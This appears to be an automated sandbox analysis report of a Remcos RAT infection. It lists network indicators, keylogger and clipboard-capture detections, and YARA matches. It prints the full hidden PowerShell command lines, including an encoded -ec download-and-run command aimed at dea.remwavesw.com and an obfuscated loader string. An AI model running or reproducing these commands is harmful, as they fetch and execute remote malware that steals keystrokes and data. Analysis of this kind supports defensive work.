Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:49738 -> 178.237.33.50:80
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /happ/MyFile02.js HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: dea.remwavesw.comConnection: Keep-Alive
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 16_2_00427321 recv, 16_2_00427321
Source: global traffic HTTP traffic detected: GET /14/items/new_image_20250324/new_image.jpg HTTP/1.1Host: ia800705.us.archive.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /happ/MyFile02.js HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: dea.remwavesw.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /kind/mate.txt HTTP/1.1Host: dea.remwavesw.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
Source: global traffic DNS traffic detected: DNS query: dea.remwavesw.com
Source: global traffic DNS traffic detected: DNS query: ia800705.us.archive.org
Source: global traffic DNS traffic detected: DNS query: swrem.justswents.com
Source: global traffic DNS traffic detected: DNS query: geoplugin.net
Source: powershell.exe, 00000003.00000002.1432281904.000001D70B9B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://dea.remwaveP
Source: powershell.exe, 00000008.00000002.2000087159.0000026930C6C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://dea.remwaveP2
Source: powershell.exe, 00000003.00000002.1432281904.000001D70A882000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1432281904.000001D70BC48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1432281904.000001D70B9B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2000087159.0000026930CA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2000087159.000002692F40E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2000087159.0000026930C6C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://dea.remwavesw.com
Source: powershell.exe, 00000003.00000002.1432281904.000001D70A882000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1432281904.000001D70A661000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://dea.remwavesw.com/h
Source: powershell.exe, 00000003.00000002.1432281904.000001D70A882000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1432281904.000001D70B9B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://dea.remwavesw.com/happ/MyFile02.js
Source: powershell.exe, 00000008.00000002.2000087159.0000026930C6C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://dea.remwavesw.com/kin
Source: powershell.exe, 00000008.00000002.2000087159.000002692F1F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2000087159.0000026930C6C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://dea.remwavesw.com/kind/mate.txt
Source: CasPol.exe, 00000010.00000002.2671512616.0000000001275000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/
Source: CasPol.exe, 00000010.00000002.2669984293.0000000001266000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gp
Source: powershell.exe, 00000008.00000002.2074017523.000002693FFEE000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000002.2668040543.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gp/C
Source: CasPol.exe, 00000010.00000002.2669984293.0000000001255000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gpG
Source: CasPol.exe, 00000010.00000002.2669984293.0000000001255000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gpL
Source: CasPol.exe, 00000010.00000002.2669984293.0000000001235000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gpSystem32
Source: CasPol.exe, 00000010.00000002.2669984293.0000000001266000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gpg
Source: CasPol.exe, 00000010.00000002.2669984293.0000000001255000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gpl
Source: powershell.exe, 00000003.00000002.1432281904.000001D70BF4E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1444711390.000001D71A6E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2074017523.000002693F045000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000008.00000002.2000087159.000002692F1F8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.1461595975.000001754E6DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1432281904.000001D70A661000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2000087159.000002692EFD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000003.00000002.1432281904.000001D70BC65000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000008.00000002.2000087159.000002692F1F8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000003.00000002.1432281904.000001D70BEF3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlp
Source: powershell.exe, 00000001.00000002.1461595975.000001754E663000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6
Source: powershell.exe, 00000001.00000002.1461595975.000001754E6AC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1432281904.000001D70A661000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2000087159.000002692EFD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000008.00000002.2074017523.000002693F045000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000008.00000002.2074017523.000002693F045000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000008.00000002.2074017523.000002693F045000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000008.00000002.2000087159.000002692F1F8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000003.00000002.1432281904.000001D70B7CE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 00000008.00000002.2000087159.000002692F1F8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ia800705.us.archive.org
Source: powershell.exe, 00000008.00000002.2000087159.000002692F1F8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ia800705.us.archive.org/14/items/new_image_20250324/new_image.jpg
Source: powershell.exe, 00000003.00000002.1432281904.000001D70BF4E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1444711390.000001D71A6E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2074017523.000002693F045000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000003.00000002.1432281904.000001D70BC65000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oneget.org
Source: powershell.exe, 00000003.00000002.1432281904.000001D70BC65000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oneget.orgX
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown HTTPS traffic detected: 207.241.230.75:443 -> 192.168.2.5:49732 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Contains functionality to register a low level keyboard hook
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 16_2_00409D1E SetWindowsHookExA 0000000D,00409D0A,00000000 16_2_00409D1E
Installs a global keyboard hook
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Windows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Jump to behavior
Contains functionality for read data from the clipboard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 16_2_0040B158 OpenClipboard,GetClipboardData,CloseClipboard, 16_2_0040B158
Contains functionality to modify clipboard data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 16_2_0041696E OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, 16_2_0041696E
Contains functionality to read the clipboard data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 16_2_0040B158 OpenClipboard,GetClipboardData,CloseClipboard, 16_2_0040B158
Contains functionality to retrieve information about pressed keystrokes
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 16_2_00409E4A GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx, 16_2_00409E4A
Yara detected Keylogger Generic
Source: Yara match File source: 16.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.powershell.exe.2694057ec78.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.powershell.exe.269403c7440.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.powershell.exe.2694057ec78.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000010.00000002.2668040543.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2074017523.000002693FFEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 5276, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: CasPol.exe PID: 3088, type: MEMORYSTR

E-Banking Fraud
barindex
Yara detected Remcos RAT
Source: Yara match File source: 16.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.powershell.exe.2694057ec78.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.powershell.exe.269403c7440.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.powershell.exe.2694057ec78.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000010.00000002.2669984293.0000000001208000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2668040543.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2669984293.000000000121B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2672109815.0000000002E5F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2074017523.000002693FFEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 5276, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: CasPol.exe PID: 3088, type: MEMORYSTR
Source: Yara match File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

Spam, unwanted Advertisements and Ransom Demands
barindex
Contains functionalty to change the wallpaper
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 16_2_0041CF2D SystemParametersInfoW, 16_2_0041CF2D

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 16.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 16.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 16.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 8.2.powershell.exe.2694057ec78.7.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 8.2.powershell.exe.2694057ec78.7.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 8.2.powershell.exe.2694057ec78.7.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 16.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 16.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 16.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 8.2.powershell.exe.269403c7440.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 8.2.powershell.exe.269403c7440.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 8.2.powershell.exe.2694057ec78.7.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 8.2.powershell.exe.2694057ec78.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000010.00000002.2668040543.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000010.00000002.2668040543.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000010.00000002.2668040543.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000008.00000002.2074017523.000002693FFEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: powershell.exe PID: 5276, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: powershell.exe PID: 5276, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: CasPol.exe PID: 3088, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} Jump to behavior
Wscript starts Powershell (via cmd or directly)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sySteM32\wINDowSpOWersHELL\v1.0\POwersHeLL.eXe" "PoWeRShELL -eX bypAsS -NoP -w hiDdEn -ec IAAJAGkATgB2AE8AawBFAC0AUgBlAFMAdABtAGUAdABoAG8AZAAgACAALQB1AHIASQAgACAAKAAdIGgAdAB0AHAAOgAvAC8AZABlAGEALgByAGUAbQB3AGEAdgBlAHMAdwAuAGMAbwBtAC8AaAAdICAACQAgAAkAKwAgAAkAHSBhAHAAcAAvAE0AeQBGAGkAbABlADAAMgAuAB0gIAAJACAACQArACAACQAdIGoAHSAgAAkAIAAJACsAIAAJAB0gcwAdICAACQApACAALQBPAHUAdABmAGkAbABFACAACQAdICQARQBOAHYAOgBhAHAAcABkAEEAVABhAFwARwB0AGgAaABGAGYAdQB0AHUAeQBoAHcALgBqAHMAHSAgADsAIAAJAFMAVABBAHIAVAAgAB0gJABFAE4AVgA6AGEAUABQAEQAQQB0AGEAXABHAHQAaABoAEYAZgB1AHQAdQB5AGgAdwAuAGoAcwAdIA== "
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command ""$Codigo = 'JNyssaBlNyssaHMNyssaYwBhNyssaHNyssaNyssabwBsNyssaG8NyssaZwBpNyssaHMNyssadNyssaBzNyssaCNyssaNyssaPQNyssagNyssaCcNyssaIwB4NyssaCMNyssaLgBlNyssaCMNyssaYQBtNyssaC8NyssaZNyssaBuNyssaGkNyssaawNyssavNyssaG0NyssabwBjNyssaC4NyssadwBzNyssaGUNyssadgBhNyssaHcNyssabQBlNyssaHINyssaLgBhNyssaGUNyssaZNyssaNyssavNyssaC8NyssaOgBwNyssaCMNyssaIwBoNyssaCcNyssaOwNyssakNyssaGINyssadQBtNyssaHNyssaNyssaZQByNyssaHMNyssaINyssaNyssa9NyssaCNyssaNyssaJNyssaBlNyssaHMNyssaYwBhNyssaHNyssaNyssabwBsNyssaG8NyssaZwBpNyssaHMNyssadNyssaBzNyssaCNyssaNyssaLQByNyssaGUNyssacNyssaBsNyssaGENyssaYwBlNyssaCNyssaNyssaJwNyssajNyssaCcNyssaLNyssaNyssagNyssaCcNyssadNyssaNyssanNyssaDsNyssaJNyssaBtNyssaGUNyssadNyssaBhNyssaGwNyssabNyssaBhNyssaGMNyssaeQBjNyssaGwNyssaZQNyssagNyssaD0NyssaINyssaNyssanNyssaGgNyssadNyssaB0NyssaHNyssaNyssacwNyssa6NyssaC8NyssaLwBpNyssaGENyssaONyssaNyssawNyssaDNyssaNyssaNwNyssawNyssaDUNyssaLgB1NyssaHMNyssaLgBhNyssaHINyssaYwBoNyssaGkNyssadgBlNyssaC4NyssabwByNyssaGcNyssaLwNyssaxNyssaDQNyssaLwBpNyssaHQNyssaZQBtNyssaHMNyssaLwBuNyssaGUNyssadwBfNyssaGkNyssabQBhNyssaGcNyssaZQBfNyssaDINyssaMNyssaNyssayNyssaDUNyssaMNyssaNyssazNyssaDINyssaNNyssaNyssavNyssaG4NyssaZQB3NyssaF8NyssaaQBtNyssaGENyssaZwBlNyssaC4NyssaagBwNyssaGcNyssaJwNyssa7NyssaCQNyssaYgBlNyssaG4NyssaegBvNyssaHQNyssaaNyssaBpNyssaG8NyssacNyssaB5NyssaHINyssaYQBuNyssaCNyssaNyssaPQNyssagNyssaE4NyssaZQB3NyssaC0NyssaTwBiNyssaGoNyssaZQBjNyssaHQNyssaINyssaBTNyssaHkNyssacwB0NyssaGUNyssabQNyssauNyssaE4NyssaZQB0NyssaC4NyssaVwBlNyssaGINyssaQwBsNyssaGkNyssaZQBuNyssaHQNyssaOwNyssakNyssaGINyssaYQB0NyssaGYNyssabwB3NyssaGwNyssaaQBuNyssaGcNyssaINyssaNyssa9NyssaCNyssaNyssaJNyssaBiNyssaGUNyssabgB6NyssaG8NyssadNyssaBoNyssaGkNyssabwBwNyssaHkNyssacgBhNyssaG4NyssaLgBENyssaG8NyssadwBuNyssaGwNyssabwBhNyssaGQNyssaRNyssaBhNyssaHQNyssaYQNyssaoNyssaCQNyssabQBlNyssaHQNyssaYQBsNyssaGwNyssaYQBjNyssaHkNyssaYwBsNyssaGUNyssaKQNyssa7NyssaCQNyssaYwBhNyssaHMNyssadNyssaByNyssaGUNyssabgBzNyssaGkNyssaYQBsNyssaCNyssaNyssaPQNyssagNyssaFsNyssaUwB5NyssaHMNyssadNyssaBlNyssaG0NyssaLgBUNyssaGUNyssaeNyssaB0NyssaC4NyssaRQBuNyssaGMNyssabwBkNyssaGkNyssabgBnNyssaF0NyssaOgNyssa6NyssaFUNyssaVNyssaBGNyssaDgNyssaLgBHNyssaGUNyssadNyssaBTNyssaHQNyssacgBpNyssaG4NyssaZwNyssaoNyssaCQNyssaYgBhNyssaHQNyssaZgBvNyssaHcNyssabNyssaBpNyssaG4NyssaZwNyssapNyssaDsNyssaJNyssaBwNyssaG8NyssadNyssaBhNyssaHMNyssacwBpNyssaGYNyssaZQByNyssaG8NyssadQBzNyssaCNyssaNyssaPQNyssagNyssaCcNyssaPNyssaNyssa8NyssaEINyssaQQBTNyssaEUNyssaNgNyssa0NyssaF8NyssaUwBUNyssaEENyssaUgBUNyssaD4NyssaPgNyssanNyssaDsNyssaJNyssaBoNyssaGUNyssacgBiNyssaGkNyssadgBvNyssaHINyssaaQB0NyssaHkNyssaINyssaNyssa9NyssaCNyssaNyssaJwNyssa8NyssaDwNyssaQgBBNyssaFMNyssaRQNyssa2NyssaDQNyssaXwBFNyssaE4NyssaRNyssaNyssa+NyssaD4NyssaJwNyssa7NyssaCQNyssabgBhNyssaGINyssabwBiNyssaGUNyssacgB5NyssaCNyssaNyssaPQNyssagNyssaCQNyssaYwBhNyssaHMNyssadNyssaByNyssaGUNyssabgBzNyssaGkNyssaYQBsNyssaC4NyssaSQBuNyssaGQNyssaZ
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sySteM32\wINDowSpOWersHELL\v1.0\POwersHeLL.eXe" "PoWeRShELL -eX bypAsS -NoP -w hiDdEn -ec IAAJAGkATgB2AE8AawBFAC0AUgBlAFMAdABtAGUAdABoAG8AZAAgACAALQB1AHIASQAgACAAKAAdIGgAdAB0AHAAOgAvAC8AZABlAGEALgByAGUAbQB3AGEAdgBlAHMAdwAuAGMAbwBtAC8AaAAdICAACQAgAAkAKwAgAAkAHSBhAHAAcAAvAE0AeQBGAGkAbABlADAAMgAuAB0gIAAJACAACQArACAACQAdIGoAHSAgAAkAIAAJACsAIAAJAB0gcwAdICAACQApACAALQBPAHUAdABmAGkAbABFACAACQAdICQARQBOAHYAOgBhAHAAcABkAEEAVABhAFwARwB0AGgAaABGAGYAdQB0AHUAeQBoAHcALgBqAHMAHSAgADsAIAAJAFMAVABBAHIAVAAgAB0gJABFAE4AVgA6AGEAUABQAEQAQQB0AGEAXABHAHQAaABoAEYAZgB1AHQAdQB5AGgAdwAuAGoAcwAdIA== " Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command ""$Codigo = 'JNyssaBlNyssaHMNyssaYwBhNyssaHNyssaNyssabwBsNyssaG8NyssaZwBpNyssaHMNyssadNyssaBzNyssaCNyssaNyssaPQNyssagNyssaCcNyssaIwB4NyssaCMNyssaLgBlNyssaCMNyssaYQBtNyssaC8NyssaZNyssaBuNyssaGkNyssaawNyssavNyssaG0NyssabwBjNyssaC4NyssadwBzNyssaGUNyssadgBhNyssaHcNyssabQBlNyssaHINyssaLgBhNyssaGUNyssaZNyssaNyssavNyssaC8NyssaOgBwNyssaCMNyssaIwBoNyssaCcNyssaOwNyssakNyssaGINyssadQBtNyssaHNyssaNyssaZQByNyssaHMNyssaINyssaNyssa9NyssaCNyssaNyssaJNyssaBlNyssaHMNyssaYwBhNyssaHNyssaNyssabwBsNyssaG8NyssaZwBpNyssaHMNyssadNyssaBzNyssaCNyssaNyssaLQByNyssaGUNyssacNyssaBsNyssaGENyssaYwBlNyssaCNyssaNyssaJwNyssajNyssaCcNyssaLNyssaNyssagNyssaCcNyssadNyssaNyssanNyssaDsNyssaJNyssaBtNyssaGUNyssadNyssaBhNyssaGwNyssabNyssaBhNyssaGMNyssaeQBjNyssaGwNyssaZQNyssagNyssaD0NyssaINyssaNyssanNyssaGgNyssadNyssaB0NyssaHNyssaNyssacwNyssa6NyssaC8NyssaLwBpNyssaGENyssaONyssaNyssawNyssaDNyssaNyssaNwNyssawNyssaDUNyssaLgB1NyssaHMNyssaLgBhNyssaHINyssaYwBoNyssaGkNyssadgBlNyssaC4NyssabwByNyssaGcNyssaLwNyssaxNyssaDQNyssaLwBpNyssaHQNyssaZQBtNyssaHMNyssaLwBuNyssaGUNyssadwBfNyssaGkNyssabQBhNyssaGcNyssaZQBfNyssaDINyssaMNyssaNyssayNyssaDUNyssaMNyssaNyssazNyssaDINyssaNNyssaNyssavNyssaG4NyssaZQB3NyssaF8NyssaaQBtNyssaGENyssaZwBlNyssaC4NyssaagBwNyssaGcNyssaJwNyssa7NyssaCQNyssaYgBlNyssaG4NyssaegBvNyssaHQNyssaaNyssaBpNyssaG8NyssacNyssaB5NyssaHINyssaYQBuNyssaCNyssaNyssaPQNyssagNyssaE4NyssaZQB3NyssaC0NyssaTwBiNyssaGoNyssaZQBjNyssaHQNyssaINyssaBTNyssaHkNyssacwB0NyssaGUNyssabQNyssauNyssaE4NyssaZQB0NyssaC4NyssaVwBlNyssaGINyssaQwBsNyssaGkNyssaZQBuNyssaHQNyssaOwNyssakNyssaGINyssaYQB0NyssaGYNyssabwB3NyssaGwNyssaaQBuNyssaGcNyssaINyssaNyssa9NyssaCNyssaNyssaJNyssaBiNyssaGUNyssabgB6NyssaG8NyssadNyssaBoNyssaGkNyssabwBwNyssaHkNyssacgBhNyssaG4NyssaLgBENyssaG8NyssadwBuNyssaGwNyssabwBhNyssaGQNyssaRNyssaBhNyssaHQNyssaYQNyssaoNyssaCQNyssabQBlNyssaHQNyssaYQBsNyssaGwNyssaYQBjNyssaHkNyssaYwBsNyssaGUNyssaKQNyssa7NyssaCQNyssaYwBhNyssaHMNyssadNyssaByNyssaGUNyssabgBzNyssaGkNyssaYQBsNyssaCNyssaNyssaPQNyssagNyssaFsNyssaUwB5NyssaHMNyssadNyssaBlNyssaG0NyssaLgBUNyssaGUNyssaeNyssaB0NyssaC4NyssaRQBuNyssaGMNyssabwBkNyssaGkNyssabgBnNyssaF0NyssaOgNyssa6NyssaFUNyssaVNyssaBGNyssaDgNyssaLgBHNyssaGUNyssadNyssaBTNyssaHQNyssacgBpNyssaG4NyssaZwNyssaoNyssaCQNyssaYgBhNyssaHQNyssaZgBvNyssaHcNyssabNyssaBpNyssaG4NyssaZwNyssapNyssaDsNyssaJNyssaBwNyssaG8NyssadNyssaBhNyssaHMNyssacwBpNyssaGYNyssaZQByNyssaG8NyssadQBzNyssaCNyssaNyssaPQNyssagNyssaCcNyssaPNyssaNyssa8NyssaEINyssaQQBTNyssaEUNyssaNgNyssa0NyssaF8NyssaUwBUNyssaEENyssaUgBUNyssaD4NyssaPgNyssanNyssaDsNyssaJNyssaBoNyssaGUNyssacgBiNyssaGkNyssadgBvNyssaHINyssaaQB0NyssaHkNyssaINyssaNyssa9NyssaCNyssaNyssaJwNyssa8NyssaDwNyssaQgBBNyssaFMNyssaRQNyssa2NyssaDQNyssaXwBFNyssaE4NyssaRNyssaNyssa+NyssaD4NyssaJwNyssa7NyssaCQNyssabgBhNyssaGINyssabwBiNyssaGUNyssacgB5NyssaCNyssaNyssaPQNyssagNyssaCQNyssaYwBhNyssaHMNyssadNyssaByNyssaGUNyssabgBzNyssaGkNyssaYQBsNyssaC4NyssaSQBuNyssaGQNyssaZ Jump to behavior
Contains functionality to shutdown / reboot the system
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 16_2_00416861 ExitWindowsEx,LoadLibraryA,GetProcAddress, 16_2_00416861
Detected potential crypto function
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FF7C64E6F78 8_2_00007FF7C64E6F78
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FF7C64FF1D0 8_2_00007FF7C64FF1D0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FF7C64E7E20 8_2_00007FF7C64E7E20
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FF7C64E99E0 8_2_00007FF7C64E99E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 16_2_0042809D 16_2_0042809D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 16_2_0045412B 16_2_0045412B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 16_2_004421C0 16_2_004421C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 16_2_004281D7 16_2_004281D7
